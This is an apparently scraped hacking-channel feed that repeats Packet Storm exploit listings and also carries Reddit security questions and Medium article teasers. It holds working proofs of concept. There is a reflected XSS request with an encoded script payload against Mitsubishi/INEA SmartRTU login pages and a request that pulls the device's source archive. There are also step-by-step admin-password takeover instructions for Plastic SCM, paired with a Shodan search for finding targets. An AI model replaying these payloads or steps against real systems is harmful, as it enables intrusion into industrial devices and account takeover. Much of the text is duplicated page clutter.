Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Mitsubishi Electric / INEA SmartRTU Cross Site Scripting
https://2.bp.blogspot.com/-ulQQD3v8DYI/WWlvnLww_dI/AAAAAAAAIRM/ialO7Idq8vAmWKoyuXUdK7x44tFKJsnBwCLcBGAs/s1600/hack_img4.png
Mitsubishi Electric and INEA SmartRTU suffer from a cross site scripting vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Mitsubishi Electric / INEA SmartRTU Cross Site Scripting
https://2.bp.blogspot.com/-ulQQD3v8DYI/WWlvnLww_dI/AAAAAAAAIRM/ialO7Idq8vAmWKoyuXUdK7x44tFKJsnBwCLcBGAs/s1600/hack_img4.png
Mitsubishi Electric and INEA SmartRTU suffer from a cross site scripting vulnerability.
MD5 |
1bf870c75a7a097da8ec1aaeb1ba24f0Download
# Exploit Title: Mitsubishi Electric & INEA SmartRTU - Reflected Cross-Site Scripting (XSS)
# Date: 2021-17-10
# Exploit Author: Hamit CİBO
# Vendor Homepage: https://www.inea.si
# Software Link: https://www.inea.si/telemetrija-in-m2m-produkti/mertu/
# Version: ME RTU
# Tested on: Windows
# CVE : CVE-2018-16061
# PoC
# Request
POST
/login.php/srdzz'onmouseover%3d'alert(1)'style%3d'position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%
3btop%3a0%3bleft%3a0%3b'bsmy8 HTTP/1.1
Host: **.**.**.***
Content-Length: 132
Cache-Control: max-age=0
Origin: http://**.**.**.***
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/68.0.3440.84
Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://**.**.**.***sss/login.php
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=el8pvccq5747u4qj9koio950l7
Connection: close
submitted=1&username=--
%3E%27%22%2F%3E%3C%2FsCript%3E%3CsvG+x%3D%22%3E%22+onload%3D%28co%5Cu006efirm%29%60%60&passw
ord=&Submit=Login
# Response
HTTP/1.1 200 OK
Date: Wed, 08 Aug 2018 08:14:25 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4
Vary: Accept-Encoding
Content-Length: 3573
Connection: close
Content-Type: text/html
action='/login.php/srdzz'onmouseover='alert(1)'style='position:absolute;width:100%;height:100%;top:0;left:0;'bsmy8'
method='post' accept-charset='UTF-8'>
Reference :
https://drive.google.com/file/d/1DEZQqfpIgcflY2cF6O0y7vtlWYe8Wjjv/view
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Mitsubishi Electric / INEA SmartRTU Cross Site Scripting
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Mitsubishi Electric / INEA SmartRTU Source Code Disclosure
https://1.bp.blogspot.com/-5p3p8L1fqP0/WWlvePVRIQI/AAAAAAAAIPs/HQNau6TSJkE3hBLTqqPcfPLddrlr7m4uACLcBGAs/s1600/h81.png
Mitsubishi Electric and INEA SmartRTU suffer from a source code disclosure vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Mitsubishi Electric / INEA SmartRTU Source Code Disclosure
https://1.bp.blogspot.com/-5p3p8L1fqP0/WWlvePVRIQI/AAAAAAAAIPs/HQNau6TSJkE3hBLTqqPcfPLddrlr7m4uACLcBGAs/s1600/h81.png
Mitsubishi Electric and INEA SmartRTU suffer from a source code disclosure vulnerability.
MD5 |
583706d96894839f4f3b86a553072053Download
# Exploit Title: Mitsubishi Electric & INEA SmartRTU - Source Code Disclosure
# Date: 2021-17-10
# Exploit Author: Hamit CİBO
# Vendor Homepage: https://www.inea.si
# Software Link: https://www.inea.si/telemetrija-in-m2m-produkti/mertu/
# Version: ME RTU
# Tested on: Windows
# CVE : CVE-2018-16060
# PoC
# Request
GET /web HTTP/1.1
Host: **.**.**.***
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64;
x64; Trident/5.0)
Connection: close
# Response
HTTP/1.1 200 OK
Date: Wed, 08 Aug 2018 08:09:53 GMT
Server: Apache/2.4.7 (Ubuntu)
Content-Location: web.tar
Vary: negotiate
TCN: choice
Last-Modified: Wed, 19 Nov 2014 09:40:36 GMT
ETag: "93800-5083300f58d00;51179459a2c00"
Accept-Ranges: bytes
Content-Length: 604160
Connection: close
Content-Type: application/x-tar
Reference :
https://drive.google.com/open?id=1QMHwTnBbIqrTkR0NEpnTKssYdi8vRsHH
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Mitsubishi Electric / INEA SmartRTU Source Code Disclosure
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Plastic SCM 10.0.16.5622 Insecure Direct Object Reference
https://3.bp.blogspot.com/-00fiGlDHfKo/WWlvZ5odqlI/AAAAAAAAIO4/nnZp17OtkHAWqiO0pbFBQSys2U4_yu8pACLcBGAs/s1600/h7.png
Plastic SCM version 10.0.16.5622 suffers from an insecure direct object reference vulnerability that lets an attacker set the administrative password.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Plastic SCM 10.0.16.5622 Insecure Direct Object Reference
https://3.bp.blogspot.com/-00fiGlDHfKo/WWlvZ5odqlI/AAAAAAAAIO4/nnZp17OtkHAWqiO0pbFBQSys2U4_yu8pACLcBGAs/s1600/h7.png
Plastic SCM version 10.0.16.5622 suffers from an insecure direct object reference vulnerability that lets an attacker set the administrative password.
MD5 |
f088be0f3c4ca9a1c3c79ded1aca8335Download
# Exploit Title: Plastic SCM 10.0.16.5622 - WebAdmin Server Access
# Shodan Dork: title:"Plastic SCM"
# Date: 18.10.2021
# Exploit Author: Basavaraj Banakar
# Vendor Homepage: https://www.plasticscm.com/
# Software Link: https://www.plasticscm.com/download/releasenotes/10.0.16.5622
# Version: Plastic SCM < 10.0.16.5622
# Tested on: Chrome,Firefox,Edge
# CVE : CVE-2021-41382
# Reference: https://infosecwriteups.com/story-of-google-hall-of-fame-and-private-program-bounty-worth-53559a95c468
# Exploit:
1. Navigate to target.com/account [This holds administrator login console]
2. Change URL to target.com/account/register [Here able to set new password for the adminstrator user]
3. Now after changing password of administrator and login to console and Navigate to target.com/configuration/authentication and set an new password for any of the users
4. Now navigate to target.com/webui/repos and login with the recently changed password for user i.e is in step 3
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Plastic SCM 10.0.16.5622 Insecure Direct Object Reference
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Worm.Win32.Fasong.c Unquoted Service Path
https://4.bp.blogspot.com/-hg5R_Iy9kqs/WWlu56TnyEI/AAAAAAAAIJM/rTW1_kDHOwg4grZYYDaMUD1TyZ2BewRDQCLcBGAs/s1600/h107.png
Worm.Win32.Fasong.c malware suffers from an unquoted service path vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Worm.Win32.Fasong.c Unquoted Service Path
https://4.bp.blogspot.com/-hg5R_Iy9kqs/WWlu56TnyEI/AAAAAAAAIJM/rTW1_kDHOwg4grZYYDaMUD1TyZ2BewRDQCLcBGAs/s1600/h107.png
Worm.Win32.Fasong.c malware suffers from an unquoted service path vulnerability.
MD5 |
db1404130b22139f3d55b7b99f48f51fDownload
Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/bc6f4a283b6b8308c60bb70cc81edfd8.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln
Threat: Worm.Win32.Fasong.c
Vulnerability: Insecure Service Path
Description: The malware creates a service with an unquoted path. Third party attackers who can place an arbitrary executable under c:\ drive can potentially undermine the integrity of the malware by having it run theirs instead with SYSTEM privs.
Type: PE32
MD5: bc6f4a283b6b8308c60bb70cc81edfd8
Vuln ID: MVID-2021-0363
Dropped files: QIRNJ.EXE
Disclosure: 10/15/2021
Exploit/PoC:
C:\>sc qc VGUPL.EXE
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: VGUPL.EXE
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\VGUPL.EXE
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : VGUPL.EXE
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Worm.Win32.Fasong.c Unquoted Service Path
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
How I hacked Nepal’s ecommerce site and bought huge packs of kitkat for free! :)
Before few months when I was tired of doing my college assignments, I started to drill up my skills in ethical hacking. I used to practise…Continue reading on Medium »
Read more...
Before few months when I was tired of doing my college assignments, I started to drill up my skills in ethical hacking. I used to practise…Continue reading on Medium »
Read more...
All Resource For SQL Injection In One Blog
Hey Everyone ! Surendra Here ! Back With another Blog
Read more...
Hey Everyone ! Surendra Here ! Back With another Blog
Read more...
hacking: security in practice
Recieved an email from an "Ethical hacker" is this a scam?
Our company email address received an email from an ethical hacker, is this something serious that I need to look into or is it just a scam and I should just block and move on? The email states:
Hello Team,
submitted by /u/Artistic-Answer-8361
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Recieved an email from an "Ethical hacker" is this a scam?
Our company email address received an email from an ethical hacker, is this something serious that I need to look into or is it just a scam and I should just block and move on? The email states:
Hello Team,
As an Ethical Hacker i found some Vulnerabilities in your site one of them is as follows.
Issue : CLICK JACKING
Clickjacking, also known as a "UI redress attack", is when an attacker uses
multiple transparent or opaque layers to trick a user into clicking on a
button or link on another page when they were intending to click on the the
top level page. Thus, the attacker is "hijacking" clicks meant for their
page and routing them to another page, most likely owned by another
application, domain, or both.
Using a similar technique, keystrokes can also be hijacked. With a
carefully crafted combination of stylesheets, iframes, and text boxes, a
user can be led to believe they are typing in the password to their email
or bank account, but are instead typing into an invisible frame controlled
by the attacker.
PoC:
IMPACTS:
By using Clickjacking technique, an attacker hijack's click's meant for one page and route them to another page, most likely for another application, domain, or both.
Remediation:
Frame busting technique is the better framing protection
technique. Sending the proper X-Frame-Options HTTP response headers
that instruct the browser to not allow framing from other
domains
For Fix:
it is missing a X-FRAME header. a user with the help of some tricky css can trick the user click on the one click actions. . You should apply a X-FRAME header
Note: I’m hoping to receive a bounty reward for my current finding. I will be looking forward to hearing from you on this and will be reporting other vulnerabilities accordingly.
kind Regards SNAPSHOT submitted by /u/Artistic-Answer-8361
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Recieved an email from an "Ethical hacker" is this a scam?
Our company email address received an email from an ethical hacker, is this something serious that I need to look into or is it just a scam and I...
hacking: security in practice
How long might it take to brute force a 24 word seed phrase (vs a 12 word phrase) if the words are known, but not the order?
(Apologies in advance as I'm relatively new to this space.)
I'm curious, if I offered up the words from a 24 word seed phrase, but not their order, with the plan to reveal the position of each word over a set amount of time how long would it realistically take someone to crack?
I know the 24th word is a checksum, so my loose understanding is that the number of possible combinations is 23! dropping by one factorial with each word revealed.
Curious at what point the passphrase could reasonably be cracked or how many words (if any) would need to be revealed until it is possible to brute force in under 24 hours.
submitted by /u/TEKSTartist
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
How long might it take to brute force a 24 word seed phrase (vs a 12 word phrase) if the words are known, but not the order?
(Apologies in advance as I'm relatively new to this space.)
I'm curious, if I offered up the words from a 24 word seed phrase, but not their order, with the plan to reveal the position of each word over a set amount of time how long would it realistically take someone to crack?
I know the 24th word is a checksum, so my loose understanding is that the number of possible combinations is 23! dropping by one factorial with each word revealed.
Curious at what point the passphrase could reasonably be cracked or how many words (if any) would need to be revealed until it is possible to brute force in under 24 hours.
submitted by /u/TEKSTartist
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
How long might it take to brute force a 24 word seed phrase (vs a...
(Apologies in advance as I'm relatively new to this space.) I'm curious, if I offered up the words from a 24 word seed phrase, but not their...
hacking: security in practice
Where does one place a bounty on decoding a proprietary communications protocol?
I got a pallet from an industrial auction of late 90's early 2000's robotic servomotors a few years ago. Half of them are brand new, the other half working pulls from decommissioned robots.
I'm compiling an open source project for using old industrial robots with ROS. I've designed some great servo amplifiers and server/pc interface cards and got it working with ABB and Panasonic hardware but can't decode all the data from the FANUC Alpha motor pulse coders. Google gives me nothing.
I gave up a year ago and every time I open the garage I have to look at it, sigh, and step around the pile. I'm willing to throw money at the problem at this point.
Where would I throw this money?
Please respect rule 2. I am not asking for your services and any comments/messages offering them will be screenshotted and sent to the subreddit moderators.
submitted by /u/-Mikee
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Where does one place a bounty on decoding a proprietary communications protocol?
I got a pallet from an industrial auction of late 90's early 2000's robotic servomotors a few years ago. Half of them are brand new, the other half working pulls from decommissioned robots.
I'm compiling an open source project for using old industrial robots with ROS. I've designed some great servo amplifiers and server/pc interface cards and got it working with ABB and Panasonic hardware but can't decode all the data from the FANUC Alpha motor pulse coders. Google gives me nothing.
I gave up a year ago and every time I open the garage I have to look at it, sigh, and step around the pile. I'm willing to throw money at the problem at this point.
Where would I throw this money?
Please respect rule 2. I am not asking for your services and any comments/messages offering them will be screenshotted and sent to the subreddit moderators.
submitted by /u/-Mikee
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Where does one place a bounty on decoding a proprietary...
I got a pallet from an industrial auction of late 90's early 2000's robotic servomotors a few years ago. Half of them are brand new, the other...
hacking: security in practice
Some websites are able to determine that your not actually in the us?
So I got this play store gift card and when I entered it on my phone it said it can only be claimed in the united states, so I changed my google billing adreeas to the us, but I still got that messagee, so I used a vpn and a new google acount, but I still got the message, so I got a windows vps that was hosted in the us and logged into my acount and tried to claim the gift card but I still got the error message, how is google play store able to determine that im not actually in the us???
submitted by /u/Agitated-Farmer-4082
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Some websites are able to determine that your not actually in the us?
So I got this play store gift card and when I entered it on my phone it said it can only be claimed in the united states, so I changed my google billing adreeas to the us, but I still got that messagee, so I used a vpn and a new google acount, but I still got the message, so I got a windows vps that was hosted in the us and logged into my acount and tried to claim the gift card but I still got the error message, how is google play store able to determine that im not actually in the us???
submitted by /u/Agitated-Farmer-4082
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Some websites are able to determine that your not actually in the us?
So I got this play store gift card and when I entered it on my phone it said it can only be claimed in the united states, so I changed my google...
hacking: security in practice
Potential iCloud Hack/Scam
I'm not really sure if this is the right sub for this, so if it is not, and you could redirect me to the right one, that would be great. Anyways, I was just browsing through reddit on my phone, and clicked on a link for a picture in someone's comment. It brought me to an Apple iCloud page that was blank with a grey loading circle. It spun for around 2 seconds before it hit me that it could be a potential hack/scam. I instantly clicked closed that browser, and now I am here. I clicked on the reddit account that posted the comment, and it was a bot account, with like 4 karma. Basically what I'm asking here, is should I be worried, or was it just nothing? I closed out of the tab before anything loaded, but I'm thinking that nothing would have ever loaded, it was just to stall while it could potentially infiltrate my phone. Thanks for any help!
submitted by /u/Lil-Parabala
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Potential iCloud Hack/Scam
I'm not really sure if this is the right sub for this, so if it is not, and you could redirect me to the right one, that would be great. Anyways, I was just browsing through reddit on my phone, and clicked on a link for a picture in someone's comment. It brought me to an Apple iCloud page that was blank with a grey loading circle. It spun for around 2 seconds before it hit me that it could be a potential hack/scam. I instantly clicked closed that browser, and now I am here. I clicked on the reddit account that posted the comment, and it was a bot account, with like 4 karma. Basically what I'm asking here, is should I be worried, or was it just nothing? I closed out of the tab before anything loaded, but I'm thinking that nothing would have ever loaded, it was just to stall while it could potentially infiltrate my phone. Thanks for any help!
submitted by /u/Lil-Parabala
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Potential iCloud Hack/Scam
I'm not really sure if this is the right sub for this, so if it is not, and you could redirect me to the right one, that would be great. Anyways,...
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
How To Pay And Buy Online Anonymously | SCOT UG
https://cdn-images-1.medium.com/max/1080/1*NJmAtbsjSg-D5borTqVW7A.png
Some factors people think of first are their personal data, like the names of credit cards they use and their biography. However, hackers…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
How To Pay And Buy Online Anonymously | SCOT UG
https://cdn-images-1.medium.com/max/1080/1*NJmAtbsjSg-D5borTqVW7A.png
Some factors people think of first are their personal data, like the names of credit cards they use and their biography. However, hackers…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
How To Pay And Buy Online Anonymously | SCOT UG
Some factors people think of first are their personal data, like the names of credit cards they use and their biography. However, hackers…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
How to know the secrets of a website server?
https://cdn-images-1.medium.com/max/640/0*rHY2MHx1yZUK5ey-.jpg
A website presents itself as all its information is public. However, there’s is an ocean of useful data hidden which isn’t visible to the…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
How to know the secrets of a website server?
https://cdn-images-1.medium.com/max/640/0*rHY2MHx1yZUK5ey-.jpg
A website presents itself as all its information is public. However, there’s is an ocean of useful data hidden which isn’t visible to the…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
How to know the secrets of a website server?
A website presents itself as all its information is public. However, there’s is an ocean of useful data hidden which isn’t visible to the…